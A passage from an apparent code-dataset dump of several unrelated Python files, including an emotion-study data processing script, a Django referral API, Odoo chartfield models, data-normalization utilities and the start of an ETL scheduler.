int(l[3])\r\n emotion += 1\r\n if (emotion == 7):\r\n emotion = 1\r\n return\r\n\r\n\r\ndef getVideoData(participantDict):\r\n emotions = {\r\n 1: \"angry\",\r\n 2: \"disgust\",\r\n 3: \"fear\",\r\n 4: \"happy\",\r\n 5: \"sad\",\r\n 6: \"surprise\",\r\n 7: \"neutral\"\r\n }\r\n emotion = 1\r\n with open(DATA_DIR + 'VideoBaseline.csv') as videoBLFile:\r\n for line in videoBLFile.readlines():\r\n l = [x.strip() for x in line.split(',')]\r\n if (l[0] == 'NULL'):\r\n break\r\n if (emotion == 1):\r\n identification = int(l[1][-3:])\r\n participant = participantDict[identification]\r\n participant['videoBLFreq'][emotions.get(emotion)] = float(l[3])\r\n emotion += 1\r\n if (emotion == 8):\r\n emotion = 1\r\n\r\n with open(DATA_DIR + 'VideoEmotion.csv') as videoFile:\r\n for line in videoFile.readlines():\r\n l = [x.strip() for x in line.split(',')]\r\n if (l[0] == 'NULL'):\r\n return\r\n if (emotion == 1):\r\n identification = int(l[1][-3:])\r\n participant = participantDict[identification]\r\n participant['videoFreq'][emotions.get(emotion)] = float(l[3])\r\n emotion += 1\r\n if (emotion == 8):\r\n emotion = 1\r\n return\r\n\r\n\r\ndef getAudioData(participantDict):\r\n emotions = {\r\n 1: \"neutral\",\r\n 2: \"happy\",\r\n 3: \"sad\",\r\n 4: \"angry\",\r\n 5: \"fear\"\r\n }\r\n emotion = 1\r\n with open(DATA_DIR + 'AudioBaseline.csv') as audioBLFile:\r\n for line in audioBLFile.readlines():\r\n l = [x.strip() for x in line.split(',')]\r\n if (l[0] == 'NULL'):\r\n break\r\n if (emotion == 1):\r\n identification = int(l[1][-3:])\r\n participant = participantDict[identification]\r\n participant['audioBL'][emotions.get(emotion)] = float(l[3])\r\n emotion += 1\r\n if (emotion == 6):\r\n emotion = 1\r\n\r\n with open(DATA_DIR + 'AudioEmotion.csv') as audioFile:\r\n for line in audioFile.readlines():\r\n l = [x.strip() for x in line.split(',')]\r\n if (l[0] == 'NULL'):\r\n return\r\n if (emotion == 1):\r\n identification = int(l[1][-3:])\r\n participant = participantDict[identification]\r\n participant['audio'][emotions.get(emotion)] = float(l[3])\r\n emotion += 1\r\n if (emotion == 6):\r\n emotion = 1\r\n return\r\n\r\n\r\ndef getVideoEmotionProbMean(directory, filename_type, participants, key):\r\n for filename in os.listdir(directory):\r\n if re.match(filename_type + '[0-9]+', filename):\r\n participant_id = int(re.search('[0-9]+', filename).group()[-3:])\r\n with open(directory + filename, 'r') as f:\r\n emotions = f.readline().split()[1:]\r\n emotion_prob = np.array([0.0] * len(emotions))\r\n num_lines = 0\r\n for line in f.readlines():\r\n num_lines += 1\r\n prob = np.array([float(p) for p in line.split()[1:]])\r\n emotion_prob += prob\r\n emotion_prob = emotion_prob / num_lines\r\n emotion_dict = dict(zip(emotions, emotion_prob))\r\n participants[participant_id][key] = emotion_dict\r\n\r\n\r\ndef getVideoAboveThresholdEmotionFreq(directory, filename_type, participants, key):\r\n threshold = 0.5\r\n for filename in os.listdir(directory):\r\n if re.match(filename_type + '[0-9]+', filename):\r\n participant_id = int(re.search('[0-9]+', filename).group()[-3:])\r\n with open(directory + filename, 'r') as f:\r\n emotions = f.readline().split()[1:]\r\n emotions_count = Counter()\r\n for line in f.readlines():\r\n prediction = line.split()[0]\r\n probabilities = [float(p) for p in line.split()[1:]]\r\n if probabilities[emotions.index(prediction)] >= threshold:\r\n emotions_count[prediction] += 1\r\n total = sum(emotions_count.values())\r\n emotions_freq = {e:v/total for e,v in emotions_count.items()}\r\n # add zero frequencies for emotions that never passed threshold\r\n for e in emotions:\r\n if e not in emotions_freq.keys():\r\n emotions_freq[e] = 0\r\n participants[participant_id][key] = emotions_freq\r\n\r\n\r\ndef getVideoEmotionFreqSkipBeginning(directory, filename_type, participants, key):\r\n n_skip = 100\r\n for filename in os.listdir(directory):\r\n if re.match(filename_type + '[0-9]+', filename):\r\n participant_id = int(re.search('[0-9]+', filename).group()[-3:])\r\n with open(directory + filename, 'r') as f:\r\n emotions = f.readline().split()[1:]\r\n frames = f.readlines()\r\n frames_relevant = frames[n_skip:]\r\n frames_predictions = [line.split()[0] for line in frames_relevant]\r\n emotion_pred, emotion_counts = np.unique(frames_predictions,\r\n return_counts=True)\r\n emotions_freq = emotion_counts / len(frames_predictions)\r\n freq_dict = {e: c for e, c in zip(emotion_pred, emotions_freq)}\r\n # add zero frequencies for emotions that weren't found\r\n for e in emotions:\r\n if e not in freq_dict.keys():\r\n freq_dict[e] = 0\r\n participants[participant_id][key] = freq_dict\r\n\r\n\r\ndef getVideoFreqTopPercent(directory, filename_type, participants, key):\r\n percent = 5/100\r\n for filename in os.listdir(directory):\r\n if re.match(filename_type + '[0-9]+', filename):\r\n participant_id = int(re.search('[0-9]+', filename).group()[-3:])\r\n with open(directory + filename, 'r') as f:\r\n emotions = f.readline().split()[1:]\r\n emotions_pred_prob = []\r\n for line in f.readlines():\r\n prediction = line.split()[0]\r\n probabilities = [float(p) for p in line.split()[1:]]\r\n emotions_pred_prob.append((prediction,probabilities[emotions.index(prediction)]))\r\n total = len(emotions_pred_prob)\r\n # sort according to probabilites\r\n emotions_pred_prob.sort(key=itemgetter(1))\r\n top_percent = emotions_pred_prob[-round(percent*total):]\r\n emotions_pred_list = [e[0] for e in top_percent]\r\n emotion_pred, emotion_counts = np.unique(emotions_pred_list,\r\n return_counts=True)\r\n emotions_freq = emotion_counts / len(emotions_pred_list)\r\n freq_dict = {e: c for e, c in zip(emotion_pred, emotions_freq)}\r\n # add zero frequencies for emotions that weren't found\r\n for e in emotions:\r\n if e not in freq_dict.keys():\r\n freq_dict[e] = 0\r\n participants[participant_id][key] = freq_dict\r\n\r\n\r\ndef removeInvalidParticipants(participants):\r\n for invalid in INVALID_LIST:\r\n try:\r\n del participants[invalid]\r\n except KeyError:\r\n pass\r\n\r\n\r\n\r\ndef getPreliminaryQuestionnaireData(participantDict):\r\n dict = {}\r\n genders = {\r\n \"נקבה\": 0,\r\n \"זכר\": 1,\r\n \"אחר\": 2\r\n }\r\n statuses = {\r\n \"רווק/ה\": \"single\",\r\n \"נשוי/אה\": \"married\",\r\n \"גרוש/ה\": \"divorced\",\r\n \"אלמן/ה\": \"widowed\"\r\n }\r\n countries = {\r\n \"ישראל\": \"Israel\",\r\n \"ארצות הברית\": \"USA\",\r\n \"אתיופיה\": \"Ethiopia\",\r\n \"ברית המועצות לשעבר\": \"USSR\",\r\n \"צרפת\": \"France\"\r\n }\r\n educations = {\r\n \"עד תיכונית\": \"high-school\",\r\n \"תיכונית (בגרות מלאה)\": \"Bagrut\",\r\n \"אקדמאית- תואר ראשון\": \"Ba\",\r\n \"אקדמאית- תואר שני\": \"Ms\",\r\n \"אקדמאית- תואר שלישי\": \"Phd\"\r\n }\r\n yesOrNo = {\r\n \"כן\": 1,\r\n \"לא\": 0\r\n }\r\n economicStates = {\r\n \"נמוך\": 1,\r\n \"נמוך-בינוני\": 2,\r\n \"בינוני\": 3,\r\n \"בינוני-גבוה\": 4,\r\n \"גבוה\": 5\r\n }\r\n religiousAffiliations = {\r\n \"יהודית\": \"J\",\r\n \"מוסלמית\": \"M\",\r\n \"נוצרית\": \"C\",\r\n \"דרוזית\": \"D\"\r\n }\r\n agreement = {\r\n '1 (לא מסכים כלל)': 1,\r\n '2 (די מתנגד)': 2,\r\n '3 (לא מסכים ולא מתנגד)': 3,\r\n '4 (די מסכים)': 4,\r\n '5 (מסכים מאוד)': 5\r\n }\r\n with open(DATA_DIR + 'PreliminaryQuestionnaire.csv', newline='', encoding='utf-8') as f:\r\n reader = csv.reader(f)\r\n titles = next(reader)\r\n for row in reader:\r\n if row[0] == '':\r\n continue\r\n\r\n participant = participantDict.get(int(row[titles.index('מספר נבדק (המספר שפלג נתן לך)')]))\r\n if participant is None:\r\n continue\r\n participant['yearOfBirth'] = int(row[titles.index('שנת לידה')])\r\n participant['gender'] = int(genders.get(row[titles.index('מגדר')]))\r\n participant['status'] = statuses.get(row[titles.index('מצב משפחתי')])\r\n participant['Birthplace'] = countries.get(row[titles.index('ארץ לידה')],\"other\")\r\n participant['FatherBirthplace'] = countries.get(row[titles.index('ארץ לידת האב')], \"other\")\r\n participant['MotherBirthplace'] = countries.get(row[titles.index('ארץ לידת האם')], \"other\")\r\n participant['education'] = educations.get(row[titles.index('השכלה (ניתן לסמן גם אם הינך במהלך רכישת ההשכלה)')])\r\n participant['steadyIncome'] = int(yesOrNo.get(row[titles.index('האם הנך בעל/ת הכנסה קבועה או מלגה?')]))\r\n participant['economicState'] = economicStates.get(row[titles.index('כיצד הנך תופס/ת את מצבך הסוציו-אקונומי?')])\r\n altruism = 0\r\n for i in [titles.index(' [אעזור לאדם זר שלא יודע את הדרך להגיע ליעד]'),\r\n titles.index(' [אפרוט כסף עבור אדם זר]'),\r\n titles.index(' [אתן כסף לצדקה]'),\r\n titles.index(' [אתרום מוצרים/ בגדים לצדקה]'),\r\n titles.index(' [אתנדב בארגון צדקה]'),\r\n titles.index(' [אתרום דם]'),\r\n titles.index(' [אעכב את המעלית עבור אדם זר כדי שיספיק לעלות]'),\r\n titles.index(' [אתן למישהו שזקוק לכך לעקוף אותי בתור]'),\r\n titles.index(' [אעזור לחבר ללימודים שאיני מכיר היטב במטלה שמתקשה בה ]'),\r\n titles.index(' [אוותר על מקומי באוטובוס/רכבת בשביל זר שנאלץ לעמוד]')]:\r\n if row[i] == '5 (בסבירות גבוהה)':\r\n altruism += 5\r\n continue\r\n if row[i] == '1 (כלל לא סביר)':\r\n altruism += 1\r\n continue\r\n altruism += int(row[i])\r\n participant['altruism'] = altruism\r\n extroversion = 0\r\n introversion = 0\r\n extroversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [דברן]')])\r\n extroversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [אנרגטי]')])\r\n extroversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [מפגין התלהבות]')])\r\n extroversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [בעל אישיות אסרטיבית/החלטית]')])\r\n extroversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [חברותי ופתוח]')])\r\n introversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [מאופק]')])\r\n introversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [נוטה להיות שקט]')])\r\n introversion += agreement.get(row[titles.index('אני רואה עצמי כאדם... [עצור ומבוייש]')])\r\n #take mean of extra- and intra- version because number of questions are not equal\r\n participant['extroversion'] = extroversion / 5\r\n participant['introversion'] = introversion / 3\r\n participant['religion'] = religiousAffiliations.get(row[titles.index('השתייכות דתית')],\"other\")\r\n return\r\n\r\ndef main():\r\n participants = createParticipants()\r\n getSelfReportData(participants)\r\n getPreliminaryQuestionnaireData(participants)\r\n getVideoData(participants)\r\n getAudioData(participants)\r\n # variations of video data\r\n getVideoEmotionProbMean(VIDEO_DIR, 'VideoData', participants, 'videoProbMean')\r\n getVideoEmotionProbMean(VIDEO_BL_DIR, 'VideoBaselineData', participants,\r\n 'videoBLProbMean')\r\n getVideoAboveThresholdEmotionFreq(VIDEO_DIR, 'VideoData', participants,\r\n 'videoThresholdFreq')\r\n getVideoAboveThresholdEmotionFreq(VIDEO_BL_DIR, 'VideoBaselineData',\r\n participants, 'videoBLThresholdFreq')\r\n getVideoEmotionFreqSkipBeginning(VIDEO_DIR, 'VideoData', participants,\r\n 'videoFreqSkipBeg')\r\n getVideoEmotionFreqSkipBeginning(VIDEO_BL_DIR, 'VideoBaselineData',\r\n participants, 'videoBLFreqSkipBeg')\r\n getVideoFreqTopPercent(VIDEO_DIR, 'VideoData', participants, 'videoFreqTopPercent')\r\n getVideoFreqTopPercent(VIDEO_BL_DIR, 'VideoBaselineData', participants, 'videoBLFreqTopPercent')\r\n\r\n # remove invalid subjects\r\n removeInvalidParticipants(participants)\r\n\r\n # save dictionary\r\n with open(DATA_DIR + DICT_FILE, 'wb') as f:\r\n dump(participants, f)\r\n\r\n happy1 =[]\r\n happy2 = []\r\n sad1 = []\r\n sad2 = []\r\n neut1 = []\r\n neut2 = []\r\n pars = {\r\n \"happy\": [happy1, happy2],\r\n \"sad\": [sad1, sad2],\r\n \"neutral\": [neut1,neut2]\r\n }\r\n\r\n for participant in participants.values():\r\n stat = pars.get(participant['emotion'][0])\r\n stat[0].append(participant['ultimatumOffer'])\r\n stat[1].append(participant['trustOffer'])\r\n\r\n # mean & std\r\n print('happy ultimatum mean offer: {:0.3f}, std: {:0.3f}'.format(mean(happy1), stdev(happy1)))\r\n print('happy trust mean offer: {:0.3f}, std: {:0.3f}'.format(mean(happy2), stdev(happy2)))\r\n print('sad ultimatum mean offer: {:0.3f}, std: {:0.3f}'.format(mean(sad1), stdev(sad1)))\r\n print('sad trust mean offer: {:0.3f}, std: {:0.3f}'.format(mean(sad2), stdev(sad2)))\r\n print('neutral ultimatum mean offer: {:0.3f}, std: {:0.3f}'.format(mean(neut1), stdev(neut1)))\r\n print('neutral trust mean offer: {:0.3f}, std: {:0.3f}'.format(mean(neut2), stdev(neut2)))\r\n\r\n # t-test\r\n print('\\nt-test:')\r\n # ultimatum\r\n [h,p] = ttest_ind(happy1,neut1)\r\n print('ultimatum: happy vs neutral: t-stat={:0.3f}, p-val={:0.3f}'.format(h,p))\r\n [h,p] = ttest_ind(sad1,neut1)\r\n print('ultimatum: sad vs neutral: t-stat={:0.3f}, p-val={:0.3f}'.format(h,p))\r\n [h,p] = ttest_ind(happy1,sad1)\r\n print('ultimatum: happy vs sad: t-stat={:0.3f}, p-val={:0.3f}'.format(h,p))\r\n # trust\r\n [h,p] = ttest_ind(happy2,neut2)\r\n print('trust: happy vs neutral: t-stat={:0.3f}, p-val={:0.3f}'.format(h,p))\r\n [h,p] = ttest_ind(sad2,neut2)\r\n print('trust: sad vs neutral: t-stat={:0.3f}, p-val={:0.3f}'.format(h,p))\r\n [h,p] = ttest_ind(happy2,sad2)\r\n print('trust: happy vs sad: t-stat={:0.3f}, p-val={:0.3f}'.format(h,p))\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"BuildDictionary.py","file_name":"BuildDictionary.py","file_ext":"py","file_size_in_byte":19638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"119653178","text":"import requests\nimport json\n\nif __name__ == '__main__':\n\turl = 'http://httpbin.org/delete'\n\tpayload = { 'nombre': 'Jairo', 'curso': 'python', 'nivel' : 'intermedio' }\n\theaders = {'Conten-Type': 'application/json', 'acces-toke': '12345'}\n\n\tresponse = requests.delete(url, data=json.dumps(payload), headers=headers)\n\n\t#GET para obtener algun recurso\n\t#POST para crearlo\n\t#PUT para actualizarlo\n\t#DELETE par eliminarlo\n\tprint(response.url)\n\n\tif response.status_code == 200:\n\t\t#print(response.content)\n\t\theaders_response = response.headers #Dic\n\t\tserver = headers_response['Server']\n\t\tprint(server)\n","sub_path":"ConsumirApis/consumirapidelete.py","file_name":"consumirapidelete.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"86241381","text":"# -*- coding: utf-8 -*-\nfrom openerp import tools\nfrom openerp import api, models, fields, _\nfrom openerp.addons.pabi_chartfield.models.chartfield import ChartField\n\n\nclass MergedChartField(ChartField):\n\n chartfield_id = fields.Many2one(\n 'chartfield.view',\n string='Budget',\n compute='_compute_chartfield',\n inverse='_inverse_chartfield',\n domain=[('model', '!=', 'res.personnel.costcenter')],\n )\n\n @api.multi\n @api.depends('chartfield_id')\n def _inverse_chartfield(self):\n for rec in self:\n res_id = rec.chartfield_id.res_id\n model = rec.chartfield_id.model\n vals = {'section_id': False, 'project_id': False,\n 'invest_asset_id': False, 'personnel_costcenter_id': False,\n 'invest_construction_phase_id': False}\n if model == 'res.section':\n vals.update({'section_id': res_id})\n if model == 'res.project':\n vals.update({'project_id': res_id})\n if model == 'res.invest.construction.phase':\n vals.update({'invest_construction_phase_id': res_id})\n if model == 'res.invest.asset':\n vals.update({'invest_asset_id': res_id})\n if model == 'res.personnel.costcenter':\n vals.update({'personnel_costcenter_id': res_id})\n rec.write(vals)\n\n @api.multi\n @api.depends('project_id', 'section_id', 'personnel_costcenter_id',\n 'invest_asset_id', 'invest_construction_id')\n def _compute_chartfield(self):\n for rec in self:\n model, res_id = False, False\n if rec.section_id:\n model, res_id = ('res.section', rec.section_id.id)\n if rec.project_id:\n model, res_id = ('res.project', rec.project_id.id)\n if rec.invest_asset_id:\n model, res_id = ('res.invest.asset', rec.invest_asset_id.id)\n if rec.invest_construction_phase_id:\n model, res_id = ('res.invest.construction.phase',\n rec.invest_construction_phase_id.id)\n if rec.personnel_costcenter_id:\n model, res_id = ('res.personnel.costcenter',\n rec.personnel_costcenter_id.id)\n if res_id:\n Chart = self.env['chartfield.view']\n rec.chartfield_id = Chart.search([('model', '=', model),\n ('res_id', '=', res_id)])\n else:\n rec.chartfield_id = False\n\n @api.onchange('chartfield_id')\n def _onchange_chartfield_id(self):\n res_id = self.chartfield_id.res_id\n if self.chartfield_id.model == 'res.section':\n self.section_id = res_id\n if self.chartfield_id.model == 'res.project':\n self.project_id = res_id\n if self.chartfield_id.model == 'res.invest.construction.phase':\n self.invest_construction_phase_id = res_id\n if self.chartfield_id.model == 'res.invest.asset':\n self.invest_asset_id = res_id\n if self.chartfield_id.model == 'res.project':\n self.project_id = res_id\n\n\nclass ChartfieldView(models.Model):\n _name = 'chartfield.view'\n _auto = False\n _order = 'seq, code'\n\n seq = fields.Integer(\n string='Sequence',\n )\n type = fields.Selection(\n [('sc:', 'Section'),\n ('pj:', 'Project'),\n ('cp:', 'Construction Phase'),\n ('ia:', 'Invest Asset'),\n ('pc:', 'Personnel'), ],\n string='Type',\n )\n model = fields.Char(\n string='Model',\n )\n id = fields.Integer(\n string='ID',\n )\n res_id = fields.Integer(\n string='Resource ID',\n )\n code = fields.Char(\n string='Code',\n )\n name = fields.Char(\n string='Name',\n )\n name_short = fields.Char(\n string='Short Name',\n )\n costcenter_id = fields.Many2one(\n 'res.costcenter',\n string='Costcenter',\n )\n\n @api.multi\n def name_get(self):\n result = []\n for rec in self:\n name = rec.name\n name_short = ('name_short' in rec) and rec['name_short'] or False\n result.append((rec.id, \"%s%s\" %\n (rec.code and '[' + rec.code + '] ' or '',\n name_short or name or '')))\n return result\n\n def init(self, cr):\n tools.drop_view_if_exists(cr, self._table)\n _sql = \"\"\"\n select * from (\n (select 1 seq, 'sc:' as type, 'res.section' as model,\n id+1000000 as id, id as res_id, code, name, name_short, costcenter_id\n from res_section where active=true)\n union all\n (select 2 seq, 'pj:' as type, 'res.project' as model,\n id+2000000 as id, id as res_id, code, name, name_short, costcenter_id\n from res_project where active=true)\n union all\n (select 3 seq, 'cp:' as type, 'res.invest.construction.phase' as model,\n p.id+3000000 as id, p.id as res_id, p.code, c.name as name,\n phase as name_short, costcenter_id\n from res_invest_construction_phase p join res_invest_construction c on\n c.id = p.invest_construction_id where p.active=true)\n union all\n (select 4 seq, 'ia:' as type, 'res.invest.asset' as model,\n id+4000000 as id, id as res_id, code, name, name_short, costcenter_id\n from res_invest_asset where active=true)\n union all\n (select 5 seq, 'pc:' as type, 'res.personnel.costcenter' as model,\n id+5000000 as id, id as res_id, code, name, name_short, costcenter_id\n from res_personnel_costcenter where active=true)\n ) a\n \"\"\"\n cr.execute(\"\"\"CREATE or REPLACE VIEW %s as (%s)\"\"\" %\n (self._table, _sql,))\n","sub_path":"pabi_chartfield_merged/models/chartfield.py","file_name":"chartfield.py","file_ext":"py","file_size_in_byte":5868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"549110645","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Jan 29, 2021\n\n@file: transforms.py\n@desc: Module containing all the transformations that can be done on a datasets.\n@author: laugh12321\n@contact: laugh12321@vip.qq.com\n\"\"\"\nimport abc\nimport numpy as np\nfrom typing import List, Dict\n\nfrom src.model import enums\nfrom src.model.models import rnn_supervised, pixel_based_cnn, \\\n pixel_based_fnnc, pixel_based_dacn\n\n\nclass BaseTransform(abc.ABC):\n @abc.abstractmethod\n def __call__(self, *args, **kwargs):\n \"\"\"\n Each subclass should implement this method.\n :param args: Arbitrary list of arguments.\n :param kwargs: Arbitrary dictionary of arguments.\n \"\"\"\n\n\nclass SpectralTransform(BaseTransform):\n def __init__(self, **kwargs):\n \"\"\"Initializer of the spectral transformation.\"\"\"\n super().__init__()\n\n def __call__(self, samples: np.ndarray,\n labels: np.ndarray) -> List[np.ndarray]:\n \"\"\"\n Transform 1D samples along the spectral axis.\n Only the spectral features are present for each sample in the datasets.\n\n :param samples: Input samples that will undergo transformation.\n :param labels: Class value for each samples.\n :return: List containing the transformed samples and the class labels.\n \"\"\"\n return [np.expand_dims(samples.astype(np.float32), -1), labels]\n\n\nclass MinMaxNormalize(BaseTransform):\n def __init__(self, min_: float, max_: float):\n \"\"\"\n Normalize each sample.\n\n :param min_: Minimum value of features.\n :param max_: Maximum value of features.\n \"\"\"\n super().__init__()\n self.min_ = min_\n self.max_ = max_\n\n def __call__(self, samples: np.ndarray, labels: np.ndarray) -> List[\n np.ndarray]:\n \"\"\"\"\n Perform min-max normalization on the passed samples.\n\n :param samples: Input samples that will undergo normalization.\n :param labels: Class values for each sample.\n :return: List containing the normalized samples and the class labels.\n \"\"\"\n return [(samples - self.min_) / (self.max_ - self.min_), labels]\n\n\ndef apply_transformations(data: Dict,\n transformations: List[BaseTransform]) -> Dict:\n \"\"\"\n Apply each transformation from provided list\n\n :param data: Dictionary with 'data' and 'labels' keys holding np.ndarrays\n :param transformations: List of transformations\n :return: Transformed data, in the same format as input\n \"\"\"\n for transformation in transformations:\n data[enums.Dataset.DATA], data[enums.Dataset.LABELS] = transformation(\n data[enums.Dataset.DATA], data[enums.Dataset.LABELS])\n return data\n\n\nUNMIXING_TRANSFORMS = {\n rnn_supervised.__name__: [SpectralTransform],\n\n pixel_based_cnn.__name__: [SpectralTransform],\n\n pixel_based_fnnc.__name__: [SpectralTransform],\n\n pixel_based_dacn.__name__: [SpectralTransform]\n}\n","sub_path":"src/utils/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"497543661","text":"\"\"\"\r\n Argument syntax:\r\n python standardized_data.py input.csv --method=method --columns column1 column2 column3 ... --output=output.csv\r\n Example:\r\n python standardized_data.py house-prices.csv --method=MINMAX --columns ID lotFrontage alley --output=request7.csv\r\n\"\"\"\r\n\r\n# Load the convenient packages\r\nimport sys\r\nfrom SupportFunction import getDataset,getTypeOfAttributes,list_attributes, standardlized_data_by_MINMAX_Method, standardlized_data_by_ZScore_Method\r\n\r\ninput = sys.argv[1]\r\noutput = sys.argv[len(sys.argv)-1].split(\"=\")[1]\r\nmethod = sys.argv[2].split(\"=\")[1]\r\nmethod=method.lower()\r\n\r\ndataset = getDataset(input)\r\nattributes = list_attributes(dataset)\r\nTypeOfAttribute = getTypeOfAttributes(dataset)\r\ncolumns = []\r\nfor index in range(4,len(sys.argv)-1,1):\r\n check=False\r\n for attribute in attributes:\r\n if (attribute.lower()==sys.argv[index].lower()):\r\n columns.append(attribute)\r\n check=True\r\n break\r\n if (check==False):\r\n print(sys.argv[index] + \" is Invalid\")\r\n\r\nfor col in columns:\r\n if (TypeOfAttribute[col]>2):\r\n print(col + \" isn't Numeric\")\r\n columns.remove(col)\r\n\r\nif (method==\"minmax\"):\r\n for col in columns:\r\n standardlized_data_by_MINMAX_Method(dataset,col,1.0,0.0)\r\nelif (method==\"zscore\"):\r\n for col in columns:\r\n standardlized_data_by_ZScore_Method(dataset,col)\r\nelse:\r\n print(\"methods available are MinMax or ZScore\")\r\n exit(0)\r\ndataset.to_csv(output)","sub_path":"Preprocessing/standardized_data.py","file_name":"standardized_data.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"542022448","text":"\"\"\"\nDefine a simple \"spelling correction\" function correct()\nthat takes a string and sees to it that\n1) two or more occurrences of the space character is compressed into one,\nand 2) inserts an extra space after a period if the period is\ndirectly followed by a letter.\nE.g. correct(\"This is very funny and cool.Indeed!\")\nshould return \"This is very funny and cool. Indeed!\"\nTip: Use regular expressions!\n\n\"\"\"\ndef correct(sentence):\n\n new_string=\" \"\n count = 0\n for i in range(len(sentence)):\n\n if sentence[i] != \" \":\n new_string = new_string + sentence[i]\n else:\n count = count +1\n \n","sub_path":"23-Spelling Correction.py","file_name":"23-Spelling Correction.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"159504586","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Referral\nfrom .serializers import ReferralSerializer\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\n# Create your views here.\n\ndef index(request):\n return HttpResponse(\"Landing page placeholder\")\n\n@api_view(['GET','PUT','DELETE'])\ndef get_delete_update_referral(request, pk):\n\ttry:\n\t\treferral = Referral.objects.get(pk=pk)\n\texcept Referral.DoesNotExist:\n\t\treturn Response(status = status.HTTP_404_NOT_FOUND)\n\t# get single referral\n\tif request.method == 'GET':\n\t\tserializer = ReferralSerializer(referral)\n\t\treturn Response(serializer.data)\n\t# update referral\n\telif request.method == 'PUT':\n\t\tserializer = ReferralSerializer(referral, data=request.data)\n\t\tif serializer.is_valid():\n\t\t\tserializer.save()\n\t\t\treturn Response(serializer.data, status=status.HTTP_204_NO_CONTENT)\n\t\treturn Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\t# delete referral\n\telif request.method == 'DELETE':\n\t\treferral.delete()\n\t\treturn Response(status=status.HTTP_204_NO_CONTENT)\n\n@api_view(['GET', 'POST'])\ndef get_post_referrals(request):\n\t# get all referrals\n\tif request.method == 'GET':\n\t\treferrals = Referral.objects.all()\n\t\tserializer = ReferralSerializer(referrals, many=True)\n\t\treturn Response(serializer.data)\n\t# create new referral\n\telif request.method == 'POST':\n\t\tdata = {\n\t\t\t'title': request.data.get('title'),\n\t\t\t'clicks': 0 if request.data.get('clicks') is None else request.data.get('clicks')\n\t\t}\n\t\tserializer = ReferralSerializer(data=data)\n\t\tif serializer.is_valid():\n\t\t\tserializer.save()\n\t\t\treturn Response(serializer.data, status=status.HTTP_201_CREATED)\n\t\treturn Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST'])\ndef increment_referral_click(request, pk):\n\t# increment referral clicks\n\ttry:\n\t\treferral = Referral.objects.get(pk=pk)\n\texcept Referral.DoesNotExist:\n\t\treturn Response(status = status.HTTP_404_NOT_FOUND)\n\t\n\treferral.clicks += 1\n\treferral.save()\n\treturn Response(status=status.HTTP_204_NO_CONTENT)\n","sub_path":"referralmanager/referrals/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"325581820","text":"\"\"\" Программа принимает действительное положительное число ​ x и целое отрицательное число\ny. Необходимо выполнить возведение числа ​ x в степень ​ y ​ . Задание необходимо реализовать\nв виде функции ​ my_func(x, y)​ . При решении задания необходимо обойтись без встроенной\nфункции возведения числа в степень.\n\nПодсказка: попробуйте решить задачу двумя способами. Первый — возведение в степень с помощью оператора **.\nВторой — более сложная реализация без оператора **, предусматривающая использование цикла.\n\n\"\"\"\n\n\ndef try_type(var, var_type):\n try:\n var_type(var)\n return True\n except ValueError:\n return False\n\n\ndef my_func_pow(x, y):\n res_2 = 1\n for i in range(abs(y) - 1):\n res_2 *= x\n return x**y, res_2 if y >= 0 else 1/res_2\n\n\nwhile True:\n tmp_list = input('Введите два числа через пробел:\\n').split(' ')\n if len(tmp_list) < 2:\n print('Вы ввели недостаточно чисел')\n elif not (try_type(tmp_list[0], int) and try_type(tmp_list[1], int)):\n print('Ошибка при вводе! Введите числа')\n else:\n print(f'Результат: {my_func_pow(int(tmp_list[0]), int(tmp_list[1]))}')\n break\n","sub_path":"lesson_3/quest_4.py","file_name":"quest_4.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"500699290","text":"import os\nimport time\nimport pandas as pd\nfrom cons import conn as conn\nimport confs\nimport pymysql\nfrom ssh import SSH_cmd as ssh_cmd\nfrom ssh import SSH as ssh_con\nmain_path=confs.main_path\nspecia_list=['dim_cust_map'] #特殊依赖表\n\nclass auto_schedule(object):\n def __init__(self,group_num=10,frency='d',tar_ssh='ssh_uat'):\n self.group_num=group_num\n if frency in ['d','w','m']:#d 表示天 w 表示zhou m表示月 \n self.frency=frency\n else:\n print('frency 参数只能是 d(天),w(周),m(月) ')\n raise Exception(\"frency 参数只能是 d(天),w(周),m(月) \") \n self.group_name=frency+'_run_group'\n sshcon=ssh_con()\n self.ssh=ssh_cmd(sshcon.ssh_uat)\n if tar_ssh=='ssh_sc':\n self.ssh=ssh_cmd(sshcon.ssh_sc)\n \n def get_job_group(self): #获取现有的分组情况\n engine=conn.meta('etl_data')\n sql_txt=\"\"\"\n SELECT s.tb_name,s.sql_file,s.group_id,s.freq_type,\n case when s.depend is null then e.cfg_denpend\n when s.depend<>e.cfg_denpend and e.cfg_denpend<>'nan' then e.cfg_denpend\n else s.depend end depend\n FROM job_group_set s \n LEFT JOIN etl_job_set e on 